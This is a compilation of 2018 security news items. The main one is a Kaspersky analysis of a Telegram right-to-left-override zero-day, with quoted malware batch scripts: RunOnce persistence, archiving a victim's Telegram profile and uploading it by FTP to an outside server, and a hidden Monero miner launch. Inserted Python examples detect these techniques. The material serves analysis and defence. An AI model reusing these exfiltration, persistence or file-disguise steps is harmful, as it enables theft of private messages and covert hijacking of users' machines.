Seagate, RackTop Launch Secure Data Storage Product for Governments
13.2.2018 securityweek BigBrothers
Seagate Technologies and RackTop Systems on Tuesday announced a partnership and their first product, a secure data storage solution designed to help government organizations address cybersecurity and compliance challenges.

The joint product from RackTop and Seagate is the Secure Data Protection Platform (SDP2), a storage solution designed to help government organizations, civilian agencies, military agencies, and contractors in the United States and Europe protect sensitive data against both insider and external threats.

Seagate and RackTop join forces to launch a data protection platform for governments

SDP2 combines encryption key management from Fornetix, a high-performance software-defined storage platform from RackTop, and disk drives and enclosures from Seagate.

The companies claim the new product is compliant with the Trade Agreements Act (TAA), the Buy American Act (BAA), NIST 800-88 (guidelines for media sanitization), NIST 800-171 (protecting unclassified data on nonfederal IT systems), FIPS 140-2 (federal standard for approving cryptographic modules), and the European Union’s upcoming General Data Protection Regulation (GDPR).

According to Seagate and RackTop, SDP2 can be used for file sharing, virtual machine storage, databases, and DevOps. It includes policy-driven data protection, anti-ransomware mechanisms, and auditing and reporting features.

The product provides encryption, versioning, orchestration, replication, retention and disposition capabilities. The solution is ideal for both small offices and data centers as it can easily scale from a few terabytes to multiple petabytes, the vendors said.

“Seagate Government Solutions is pleased to partner with RackTop to create exceptional data security solutions to meet rising risk management standards,” said Mike Moritzkat, vice president and general manager of Seagate Government Solutions. “The Secure Development Protection Platform – or SDP2 – is the first of many products Seagate is delivering to meet increasingly stringent data security regulations in both the U.S. and EU.”


Major Browser Vendors to Restrict AppCache to Secure Connections
13.2.2018 securityweek Attack
Major web browser vendors plan on restricting the use of the Application Cache (AppCache) feature to secure connections in an effort to protect users against potential attacks.

Mozilla on Monday was the first to make an official announcement, but the developers of Chrome, Edge and WebKit (the layout engine used by Apple’s Safari) said they plan on doing the same.

AppCache is an HTML5 application caching mechanism that allows website developers to specify which resources should be available offline. This improves speed, reduces server load, and enables users to browse a site even when they are offline.

While application caching has some benefits, it can also introduce serious security risks, which is partly why it has been deprecated and its use is no longer recommended.

The problem is that AppCache does not properly revalidate its cache, making it possible for man-in-the-middle (MitM) attackers to load malicious content. Mozilla has described the following attack scenario:

“A user logs onto a coffee shop WiFi where an attacker can manipulate the WiFi that is served over HTTP. Even if the user only visits one HTTP page over the WiFi, the attacker can plant many insecure iframes using AppCache which allows the attacker to rig the cache with malicious content manipulating all of those sites indefinitely. Even a cautious user who decides only to login to their websites at home is at risk due to this stale cache.”

Mozilla has already banned access to AppCache from HTTP pages in Firefox 60 Nightly and Beta, and will do the same in the main branch starting with Firefox 62, scheduled for release in early May.

Mozilla says it will continue to remove features for websites using HTTP and advised developers to implement TLS encryption in order to preserve current functionality.

“Going forward, Firefox will deprecate more APIs over insecure connections in an attempt to increase adoption of HTTPS and improve the safety of the internet as a whole,” explained Mozilla’s Jonathan Kingston.

Google Chrome developers initiated a discussion on removing AppCache on insecure origins back in 2016, but failed to find a solution. Following Mozilla’s lead, the Chrome team has picked up discussions on this topic on February 2.

Microsoft reportedly started making plans for AppCache restriction last week and WebKit developers are also looking into making changes. Some modifications will also be made in the HTML standard.


Litecoin, Dash to Dethrone Bitcoin on Dark Web: Report
13.2.2018 securityweek CoinMine
Litecoin and Dash are expected to replace Bitcoin as the most used payment method on underground portals and cybercriminal marketplaces, Recorded Future suggests in a new report.

For the past couple of years, cybercriminals from all geographies and of all languages have been dissatisfied with the performance and cost of Bitcoin transactions, and forum discussions suggest alternate payment methods would soon surge.

At the moment, Bitcoin remains the most popular crypto-currency on the Dark Web, followed by Litecoin, an analysis (PDF) of 150 of the most prominent message boards, marketplaces, and illicit services on the Dark Web has revealed. Dash is also a top preference among members of the Dark Web, the same as Monero, Recorded Future's researchers discovered.

The diminished popularity of Bitcoin appears to stem from the higher transaction fees seen since mid-2017. The crypto-coin itself has increased in value, but this also fueled a spike in fees for small transactions.

“The underground economy is dependent on smaller transactions in its day-to-day operations, with the cost of the average product or service beginning between $50 and $300. With the addition of exuberant transaction fees, the price of such products and services suddenly inflates tremendously,” Recorded Future notes.

In addition to these high fees, which could sometimes amount to 30% of the transaction value, cybercriminals would also have to face delays in the completion of transactions, derived from an adopted rule of requiring three confirmations before treating transactions as complete.

“The prospect of having to wait up to 24 hours to confirm their transactions, in addition to exuberant payment fees, has rendered Bitcoin payments unusable for a large group of bad guys,” the researchers point out.

Based on underground discussions, and buoyed by overwhelming support and frequent references to it, Dash appeared set to emerge as the next major Dark Web currency, but the crypto-coin didn’t live up to expectations. It did, however, prove highly popular on many dark portals, as many users migrated to it at the expense of Bitcoin.

Despite its constant appearance in cyber-attacks – in incidents targeting web servers, end user computers (via malware or in-browser scripts), IoT devices, and ICS systems with mining software – over the past year, Monero didn’t manage to claim the top position either.

Monero did take the top position in a poll among “several hundreds of members of a popular criminal forum” on the crypto-coin expected to be adopted next, Recorded Future’s report reveals.

“Our subsequent research showed that the vendors alone represent the primary deciding factor regarding which payments will be implemented and which will not,” the security firm says.

Following the analysis of 150 of the most prominent Dark Web portals, the researchers discovered that Bitcoin remains the standard, as all vendors accept it as a payment. The second most popular crypto-coin is Litecoin, being accepted by 30% of all vendors who implemented alternative payment methods.

Dash landed in third position, being accepted by 20% of these vendors, followed by Bitcoin Cash at 13%. Ethereum and Monero round out the list, at 9% and 6%, respectively.

Reasons Litecoin is the second most popular crypto-currency after Bitcoin include the fact that it is also the second oldest, being introduced in 2011. Intended as a superior version of Bitcoin, its core technology is nearly identical to Bitcoin’s, but it allows for faster transactions and significantly lower commission fees.

However, it doesn’t offer any additional security to its owner, the researchers point out. Just as with Bitcoin, Litecoin transactions are entirely transparent.

The security firm discovered that Litecoin is second most preferred on 35% of Eastern European underground portals, followed by Dash at 24%, and Bitcoin Cash at 15%. On English speaking Dark Web portals, however, Monero is the second most popular, at 15%, followed by Litecoin at 11%.

“While Russians favored the accessibility and convenience of Litecoin, with a more diverse and established supporting infrastructure, English-speaking members seem to be more security-oriented, choosing Monero for its built-in safety features,” Recorded Future notes.

The security researchers expect the cryptocurrency diversification trend to only intensify and suggest that Bitcoin might lose its dominant position among payment methods on the Dark Web in the next six to 12 months. However, it is expected to remain one of the main payment instruments.

“On the other hand, Litecoin and Dash will take their place next to Bitcoin as the everyday payment currencies of the dark web. At the same time, as these currencies become more readily available to a general population, malicious tools such as ransomware will also continue to evolve to take advantage of the mainstream trend,” the researchers conclude.


Microsoft Brings Windows Defender ATP to Windows 7, 8.1
13.2.2018 securityweek Safety
Microsoft on Monday announced plans to make Windows Defender Advanced Threat Protection (ATP) available for Windows 7 SP1 and Windows 8.1 devices.

First announced in early 2016, Windows Defender ATP was packed in Windows 10 in an attempt to harden the platform and provide users with a unified endpoint security tool.

Improvements made to Windows Defender ATP since include protection against code injection attacks, detection of suspicious PowerShell activities, and the ability to fend off emerging threats via Windows Defender Exploit Guard.

While these enhancements make Windows 10 a more secure platform, organizations that use a mixture of Windows 7 and Windows 10 devices remain exposed to attacks, and Microsoft aims to tackle the issue by adding support for older platform iterations to Windows Defender ATP.

“Starting this summer, customers moving to Windows 10 can add Windows Defender ATP Endpoint Detection & Response (EDR) functionality to their Windows 7 and Windows 8.1 devices, and get a holistic view across their endpoints,” Rob Lefferts, Partner Director, Windows & Devices Group, Security & Enterprise, Microsoft, notes in a blog post.

Windows 7 and Windows 8.1 will get a behavioral based EDR solution to provide insight into threats on an organization’s endpoints. All events are logged in the Windows Defender Security Center, which is the cloud-based console for Windows Defender ATP.

“Security teams benefit from correlated alerts for known and unknown adversaries, additional threat intelligence, and a detailed machine timeline for further investigations and manual response options,” Lefferts notes.

He also notes that the solution will allow organizations to run third-party antivirus solutions on the endpoints, although pairing it with Windows Defender Antivirus (also known as System Center Endpoint Protection (SCEP) for down-level) would be the best option. The advantage when using it with Windows Defender Antivirus would be that both malware detections and response actions would be available in the same console.

Microsoft plans on providing its customers with access to a public preview of the down-level EDR solution in spring, so that security teams would learn more on what the solution has to offer in terms of detecting suspicious behavior on Windows 7 and Windows 8.1 devices.

Making Windows Defender ATP available for older Windows releases is another step in Microsoft’s effort to broaden the availability of its security product. In November, the company announced partnerships to bring the tool to macOS, Linux, iOS, and Android devices as well.

On Monday, SentinelOne revealed plans to bring Windows Defender ATP to its Mac and Linux users too, courtesy of integration with the SentinelOne Endpoint Protection Platform (EPP). The company is already providing customers with beta access to the solution.

Once the planned integration is complete, new events from onboarded MacOS and Linux devices will start natively surfacing into the Windows Defender ATP console, without the need for additional infrastructure, the company says.

“With Windows Defender ATP for Windows 10, Windows Server 2012R2 and 2016, now for Windows 7 and Windows 8.1 and our partner integration for non-Windows devices, we give security teams a single solution to detect and respond to advanced attacks across the majority of their endpoints,” Lefferts concludes.


New details emerge from Equifax breach, the hack is worse than previously thought
13.2.2018 securityaffairs Incident

New documents provided by Equifax to senators revealed that the security breach suffered by the firm involved additional data for some customers.
In 2017 Equifax confirmed it had suffered a massive data breach: cybercriminals stole the sensitive personal records of 145 million US citizens, as well as those of hundreds of thousands of people in Canada and the UK.

Attackers exploited the CVE-2017-5638 Apache Struts vulnerability. The flaw affects the Jakarta Multipart parser upload function in Apache Struts and could be exploited by an attacker sending a maliciously crafted request to an Apache web server.

The vulnerability had been fixed back in March, but the company did not update its systems, a point also made by an Apache spokeswoman to the Reuters agency.

Compromised records include names, social security numbers, birth dates, home addresses, credit-score dispute forms, and for some users also the credit card numbers and driver license numbers.

Now experts argue the Equifax hack is worse than previously thought. According to documents provided by Equifax to the US Senate Banking Committee, the attackers also stole taxpayer identification numbers, phone numbers, email addresses, and credit card expiry dates belonging to some Equifax customers.

This means that crooks have all the data necessary to commit any kind of fraud by stealing victims’ identities.


“As your company continues to issue incomplete, confusing and contradictory statements and hide information from Congress and the public, it is clear that five months after the breach was publicly announced, Equifax has yet to answer this simple question in full: what was the precise extent of the breach?” criticized Senator Elizabeth Warren (D-MA) who disclosed the documents.

Equifax pointed out that the additional information exposed in the breach relates only to a limited number of users.

Another curious aspect of the Equifax case is that C-level management was allowed to retire with multi-million dollar severance packages.

On Monday, the company announced Jamil Farshchi as its Chief Information Security Officer (CISO); he replaces Chief Security Officer Susan Mauldin, who retired from the company after the data breach was disclosed in late 2017.


Zero-day vulnerability in Telegram
13.2.2018 Kaspersky Vulnerability
Cybercriminals exploited a Telegram flaw to launch multipurpose attacks.
In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

Right-to-left override in a nutshell
The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.


Mikko Hypponen (@mikko), 15:52 - 15 Jul 2013:
New Mac Malware uses Right-to-Left override character (U+202E) to cause OS X to display this… http://www.f-secure.com/weblog/archives/00002576.html …
Launching an attack on Telegram
Below is an account of how this vulnerability was exploited in Telegram:

The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:
evil.js -> photo_high_re*U+202E*gnp.js
Where *U+202E* is the RLO character, which makes Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file; it still has the extension *.js.

The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:

When the user clicks on this file, the standard Windows security notification is displayed:

Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched.
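To make the filename trick concrete from the defender’s side, here is an added Python example (not Kaspersky’s code) that finds Unicode bidi control characters in a filename, simulates how a naive viewer renders an RLO run, and compares the extension shown to the user with the one the OS actually uses. The sample names are constructed after the patterns quoted in this article.

```python
"""Detect bidirectional-override tricks in filenames.

Added example, not code from the Kaspersky report. A viewer that honours
U+202E (RLO) draws everything after it right-to-left, so the stored name
'photo_high_re<RLO>gnp.js' is displayed as 'photo_high_resj.png' while the
OS still treats the file as a .js script.
"""

# Unicode bidi control characters that can reorder or hide displayed text.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
    "\u200e": "LRM", "\u200f": "RLM", "\u061c": "ALM",
}
RLO = "\u202e"
PDF = "\u202c"

# Extensions Windows will execute when the file is double-clicked (subset).
RUNNABLE = {".exe", ".scr", ".com", ".bat", ".cmd", ".js", ".jse",
            ".vbs", ".vbe", ".ps1", ".msi", ".hta"}


def find_bidi_controls(filename):
    """Return (index, short name) for every bidi control in the filename."""
    return [(i, BIDI_CONTROLS[ch]) for i, ch in enumerate(filename)
            if ch in BIDI_CONTROLS]


def rendered_name(filename):
    """Approximate what a naive renderer shows: the run after an RLO is
    reversed until a PDF (pop directional formatting) or end of string;
    other control characters are invisible and simply dropped."""
    out, i = [], 0
    while i < len(filename):
        ch = filename[i]
        if ch == RLO:
            end = filename.find(PDF, i + 1)
            if end == -1:
                end = len(filename)
            out.append(filename[i + 1:end][::-1])
            i = end + 1
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def _extension(name):
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def true_extension(filename):
    """The extension the OS uses: controls stripped, text after last dot."""
    clean = "".join(ch for ch in filename if ch not in BIDI_CONTROLS)
    return _extension(clean)


def rendered_extension(filename):
    """The extension a user reads off the displayed name."""
    return _extension(rendered_name(filename))


def assess(filename):
    """Summarise the mismatch between what is shown and what will run."""
    controls = find_bidi_controls(filename)
    real, shown = true_extension(filename), rendered_extension(filename)
    return {
        "controls": controls,
        "rendered": rendered_name(filename),
        "true_extension": real,
        "rendered_extension": shown,
        "executes": real in RUNNABLE,
        # Controls present AND the visible extension lies about the real one.
        "suspicious": bool(controls) and shown != real,
    }


if __name__ == "__main__":
    # Constructed names following the patterns seen in this campaign.
    for sample in ("photo_high_re\u202egnp.js", "name\u202egpj.exe", "report.pdf"):
        print(assess(sample))
```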

Exploitation in the wild
After learning of the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control
The aim of this sort of attack is to take control of the victim’s system; it involves the attacker studying the target system’s environment and installing additional modules.

At the first stage, a downloader written in .NET is sent to the target; it uses the Telegram API as its command protocol:

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:

When launched, it modifies a startup registry key to achieve persistence on the system and copies its executable file into one of the directories, depending on the environment:

Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:

The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below:

Command (English translation) | Function
“Онлайн (“Online) | Send a list of files in a directory to the control bot.
“Запус (“Launch) | Launch an executable file using Process.Start().
“Логгер (“Logger) | Check whether a tor process is running, download logg.zip, unpack it, delete the archive and launch its contents.
“Скачать (“Download) | Download a file into its own directory.
“Удалить (“Delete) | Delete a file from its own directory.
“Распаковать (“Unpack) | Unpack an archive in its own directory using the specified password.
Убить (Kill) | Terminate the specified process using process.Kill().
Скачат (Download) | Same as “Скачать (Download) above, with different command parsing.
Запуск (Launch) | Same as “Запус (Launch) above, with different command parsing.
Удалить (Delete) | Same as “Удалить (Delete) above, with different command parsing.
Распаковать (Unpack) | Same as “Распаковать (Unpack) above, with different command parsing.
Процессы (Processes) | Send a list of processes running on the target PC to the control bot.
An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user.

Miners and more
Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet.

Scenario #1

At the first stage of the attack, an SFX archive with a script is used that launches an executable file:

Path=%temp%\adr
Setup=%temp%\adr\run.exe
Silent=1
Overwrite=2

This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this:

As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security.

Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive.

nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). It can use the resources of both the CPU and the graphics accelerator:

taskmgn.exe – another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. It contains a known, specific string with a PDB path:

We have seen several versions of this batch script, some of which have extra features:

This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive containing more miners and a Remote Manipulator System (RMS) client, a remote-administration tool similar to TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:

The attack flowchart is approximately as follows:

We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware.

The file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following contents:

All components named st*.exe are executable PE files converted in a similar way from batch scripts.

The SFX script launches the component st1.exe:

Path=%temp%/adress
Setup=%temp%/adress/st1.exe
Silent=1
Overwrite=2

st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry:

reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f

So the st2.exe file launches the next time the system is booted:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%\sss
cd %temp%\sss #Creates a temporary directory
"%temp%\adress\WinRAR.exe" A -ibck -inul -r -agYY-mm-dd-hh-mm-ss "%temp%\sss\1.rar" "%appdata%\Telegram Desktop" #Packs the Telegram directory into a RAR archive
TIMEOUT /T 60 /NOBREAK
:begin
ping -n 1 ya.ru |>nul find /i "TTL=" && (start "" %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin) #Checks Internet connection and launches st3.exe

As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:

@echo XXXXXXXX>command.txt
@echo XXXXXXXX>>command.txt
@echo binary>>command.txt
@echo mput %temp%\sss\*.rar>>command.txt
@echo quit>>command.txt
ftp -s:command.txt -i free11.beget.com
del command.txt
attrib %temp%/adress +H
attrib %temp%/adress\* +H
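As an added detection example (not from the Kaspersky report), the following Python scans process command lines, such as those a Sysmon or EDR agent records, for the st1/st2/st3 tradecraft described above: RunOnce persistence pointing into a user-writable directory, an archiver packing the Telegram Desktop profile, a scripted ftp session, and the messenger process being killed beforehand. The sample log lines are constructed; three of them are the commands quoted above, the rest are benign decoys.

```python
"""Hunt for the st1/st2/st3 behaviour chain in recorded command lines.

Added example, not Kaspersky code. Each rule is a regex plus an optional
extra predicate so that, e.g., ordinary WinRAR backups do not fire unless
the archive target is the Telegram Desktop profile.
"""
import re

# Environment variables / path fragments that resolve to user-writable dirs.
USER_WRITABLE = re.compile(
    r"%temp%|%appdata%|%localappdata%|\\appdata\\|\\temp\\", re.I)

RULES = [
    # reg add ...\CurrentVersion\Run or RunOnce with data under %temp% etc.
    ("runkey_persistence_from_user_dir",
     re.compile(r"^\s*reg(\.exe)?\s+add\s+\S*\\currentversion\\run(once)?\b", re.I),
     lambda cmd: bool(USER_WRITABLE.search(cmd))),
    # Archiver "add" operation whose target is the Telegram Desktop profile.
    ("archiver_packs_telegram_profile",
     re.compile(r'(winrar|rar|7z|7za)(\.exe)?"?\s+a\b', re.I),
     lambda cmd: "telegram desktop" in cmd.lower()),
    # ftp.exe driven by a script file (-s:) is how st3.exe exfiltrated.
    ("scripted_ftp_session",
     re.compile(r'(^|[\\\s"])ftp(\.exe)?\s+.*-s:', re.I),
     lambda cmd: True),
    # Telegram is terminated so its profile directory can be archived.
    ("messenger_process_killed",
     re.compile(r"(taskkill\s+.*/im\s+telegram\.exe|tskill\s+telegram\b)", re.I),
     lambda cmd: True),
]


def scan_command_line(cmd):
    """Return the names of all rules that match one command line."""
    return [name for name, pattern, extra in RULES
            if pattern.search(cmd) and extra(cmd)]


def scan_log(lines):
    """Return [(line_no, [rule names])] for every line that fires a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        fired = scan_command_line(line)
        if fired:
            hits.append((n, fired))
    return hits


# Constructed sample: lines 1, 3, 4 and 5 are the commands quoted in the
# article; lines 2 and 6 are benign administrative activity.
SAMPLE_COMMAND_LINES = [
    r"reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f",
    r'"C:\Program Files\WinRAR\WinRAR.exe" a backup.rar C:\Users\alice\Documents',
    r'"%temp%\adress\WinRAR.exe" A -ibck -inul -r -agYY-mm-dd-hh-mm-ss "%temp%\sss\1.rar" "%appdata%\Telegram Desktop"',
    r"ftp -s:command.txt -i free11.beget.com",
    r"taskkill /IM telegram.exe",
    r"reg add HKLM\Software\Contoso /v Setting /d 1 /f",
]

if __name__ == "__main__":
    for line_no, rules in scan_log(SAMPLE_COMMAND_LINES):
        print(f"line {line_no}: {', '.join(rules)}")
```

Because the rules fire on individual lines, a real deployment would correlate hits from the same host within a short window; seeing all four together is the stronger signal.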

On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims:

Each dump contains, in addition to the Telegram client’s executables and utility files, an encrypted local cache holding various files used in personal communications: documents, videos, audio recordings and photos.

Scenario #2

Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload:

The payload is an SFX archive with the following script:

svchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed.

The script contains the appropriate comments:

The miner itself is launched as follows:

WshShell.Run "csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1" & cores, 0

The pool address is associated with the cryptocurrency Monero.

On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:

Conclusion
It appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we detected occurring in Russia. Also, while conducting detailed research into these attacks we discovered many artifacts pointing to the involvement of Russian cybercriminals.

We don’t have exact information about for how long, or in which versions of Telegram’s products, the vulnerability was present. What we do know is that its exploitation in Windows clients began in March 2017. We informed the Telegram developers of the problem, and the vulnerability no longer occurs in Telegram’s products.

This paper presents only those cases that were reported by Kaspersky Lab’s telemetry systems. The full scope and other methods of exploitation remain unknown.

IoC
C2 servers
http://nord.adr[.]com[.]ua/

Filenames
name?gpj.exe
name?gpj.rar
address?gpj.scr
address_?gpj.scr
photoadr?gepj.scr


Thousands of Government Websites Hacked to Mine Cryptocurrencies
13.2.2018 thehackernews CoinMine

There was a time when hackers simply defaced websites to get attention, then they started hijacking them to spread banking trojan and ransomware, and now the trend has shifted towards injecting scripts into sites to mine cryptocurrencies.
Thousands of government websites around the world have been found infected with a specific script that secretly forces visitors' computers to mine cryptocurrency for attackers.
The cryptocurrency mining script injection was found on over 4,000 websites, including those belonging to the UK's National Health Service (NHS), the Student Loans Company, the data protection watchdog Information Commissioner's Office (ICO), Queensland legislation, as well as the US government's court system.
Users who visited the hacked websites immediately had their computers' processing power hijacked, also known as cryptojacking, to mine cryptocurrency without their knowledge, potentially generating profits for the unknown hacker or group of hackers.
It turns out that hackers managed to compromise a popular third-party accessibility plugin called "Browsealoud," used by all of the affected websites, and inject their cryptocurrency-mining script into its code.
Browsealoud is a popular third-party browser plugin that helps blind and partially-sighted users access the web by converting site text to audio.
The script inserted into the compromised Browsealoud software belongs to CoinHive, a browser-based Monero mining service that lets website administrators earn revenue by using the CPU resources of visitors.
The mining software was found in more than 4,200 websites, including The City University of New York (cuny.edu), Uncle Sam's court information portal (uscourts.gov), the UK's Student Loans Company (slc.co.uk), privacy watchdog The Information Commissioner's Office (ico.org.uk) and the Financial Ombudsman Service (financial-ombudsman.org.uk), UK NHS services, Manchester.gov.uk, NHSinform.scot, agriculture.gov.ie, Croydon.gov.uk, ouh.nhs.uk, legislation.qld.gov.au, the list goes on.
The full list of affected websites can be found here.
After UK-based infosec consultant Scott Helme raised the alarm about this hack when one of his friends mentioned getting anti-virus alerts on a UK Government website, BrowseAloud’s operator Texthelp took down its site to resolve the issue.
Here’s what Texthelp's chief technology officer Martin McKay said in a blog post:
"In light of other recent cyber attacks all over the world, we have been preparing for such an incident for the last year. Our data security action plan was actioned straight away and was effective, the risk was mitigated for all customers within a period of four hours."
"Texthelp has in place continuously automated security tests for Browsealoud - these tests detected the modified file, and as a result, the product was taken offline."
This action removed Browsealoud from all websites immediately, addressing the security issue without customers having to take any action.
The company also assured that "no customer data has been accessed or lost," and that its customers will receive a further update as soon as the security investigation gets completed.
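The Browsealoud compromise is the case Subresource Integrity (SRI) addresses: a site pins the hash of a third-party script it embeds, so a browser refuses to run a modified copy even when the vendor’s server is serving it. The following is an added Python example, not Texthelp’s code; the two script bodies are constructed stand-ins, not Browsealoud’s real source.

```python
"""Compute and verify Subresource Integrity (SRI) tokens for a third-party
script. Added example with constructed script bodies.

A site owner computes the token once and embeds it in the <script> tag;
the browser then hashes what it actually downloaded and refuses to execute
the resource if no token of the strongest listed algorithm matches.
"""
import base64
import hashlib

# Hash algorithms the SRI specification allows.
ALGORITHMS = {"sha256": hashlib.sha256,
              "sha384": hashlib.sha384,
              "sha512": hashlib.sha512}


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return an integrity token such as 'sha384-<base64 digest>'."""
    digest = ALGORITHMS[algorithm](content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes, algorithm: str = "sha384") -> str:
    """Build the <script> tag a site embeds for a pinned third-party file.
    crossorigin="anonymous" is required for SRI on cross-origin scripts."""
    return (f'<script src="{src}" integrity="{sri_hash(content, algorithm)}" '
            f'crossorigin="anonymous"></script>')


def verify_integrity(content: bytes, integrity_attr: str) -> bool:
    """Mimic the browser check. The attribute may hold several tokens; only
    tokens of the strongest known algorithm count, and the content passes if
    it matches any of them. Unlike browsers, which load a resource whose
    integrity attribute they cannot parse, this helper fails closed."""
    by_alg: dict[str, set[str]] = {}
    for token in integrity_attr.split():
        alg, _, digest = token.partition("-")
        if alg in ALGORITHMS and digest:
            by_alg.setdefault(alg, set()).add(digest)
    if not by_alg:
        return False
    strongest = max(by_alg, key=lambda a: ALGORITHMS[a]().digest_size)
    expected = set()
    for d in by_alg[strongest]:
        try:
            expected.add(base64.b64decode(d, validate=True))
        except (ValueError, TypeError):
            continue  # malformed token: ignore it rather than crash
    return ALGORITHMS[strongest](content).digest() in expected


# Constructed stand-ins for the vendor's script before and after tampering.
ORIGINAL_JS = (b"window.ba = window.ba || {};\n"
               b"ba.speak = function (text) { /* read page text aloud */ };\n")
TAMPERED_JS = ORIGINAL_JS + b"/* injected by attacker */ startMiner();\n"

# What the site owner would have pinned when adopting the plugin.
PINNED_INTEGRITY = sri_hash(ORIGINAL_JS)


def demo() -> tuple[bool, bool]:
    """Return (original_accepted, tampered_accepted) under the pinned hash."""
    return (verify_integrity(ORIGINAL_JS, PINNED_INTEGRITY),
            verify_integrity(TAMPERED_JS, PINNED_INTEGRITY))


if __name__ == "__main__":
    print(script_tag("https://vendor.example/plugin.js", ORIGINAL_JS))
    print("original accepted, tampered accepted:", demo())
```

SRI only protects resources whose URL the page controls; a pinned loader that itself fetches further scripts at runtime still needs a Content Security Policy to constrain what it can pull in.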


Cryptocurrency Miners Not Uncommon on Industrial Systems
13.2.2018 securityweek  CoinMine
Cryptocurrency miners can pose a serious threat to industrial systems and it’s not uncommon for this type of malware to make its way into operational technology (OT) environments.

Industrial cybersecurity firm Radiflow reported last week that it had identified a piece of malware designed to mine Monero on a human-machine interface (HMI) system at a wastewater facility in Europe. The company warned that the resource consumption associated with this type of malware can severely disrupt plant monitoring tools and the affected organization’s response times.

Cryptocurrency mining malware has become increasingly widespread and it has recently been found even on numerous government websites in the United States, the United Kingdom and Australia.

This type of malware is also fairly common on industrial systems, according to several cybersecurity firms contacted by SecurityWeek.

A study conducted last year by Dragos showed that roughly 3,000 unique industrial sites had been hit by traditional, non-targeted malware. The company discovered approximately 6,000 malware infections, including instances of cryptojacking, said Robert M. Lee, CEO and founder of Dragos.

Kaspersky Lab ICS-CERT told SecurityWeek that roughly 3.3 percent of the industrial control systems (ICS) monitored by the company between February 2017 and February 2018 were targeted with cryptocurrency miners, with an increasing trend observed since September 2017.

Cryptocurrency miners on industrial systems - Credits: Kaspersky Lab ICS-CERT

“Industrial infrastructure is an appealing target for mining attacks due to high power, meaning criminals can earn more in less time. As usually the case with miners, users might notice slowdown of programs and systems performance that inevitably affects the user experience in general,” Kaspersky Lab ICS-CERT said. “In terms of ICS, a spike in CPU load, as a result of miners’ infection, leads to an increase in response time of monitoring tools for SCADA/HIM servers. It’s important to note that most of the ICS are real-time systems designed for process control, where response time is the critical system indicator.”

Darktrace, a security firm known for its AI-based defense technology, said it had identified more than 20 cryptocurrency miner attacks over the past six months among its customers in the energy and utilities sectors.

Overall, Darktrace said it had identified more than 400 crypto-mining related incidents across 5,000 customer deployments in more than 30 industries. There has been a steady increase in the number of detections, with roughly 100 mining scripts and cryptocurrency malware incidents detected in January.

CyberX used the Shodan search engine to locate a European wastewater facility infected with cryptocurrency mining malware. Just like in the incident described by Radiflow, the threat had been found on an HMI device running CIMPLICITY software from GE Digital. The industrial cybersecurity firm managed to grab a screenshot of the infected HMI.

HMI in European wastewater facility infected with cryptocurrency miner - Credits: CyberX

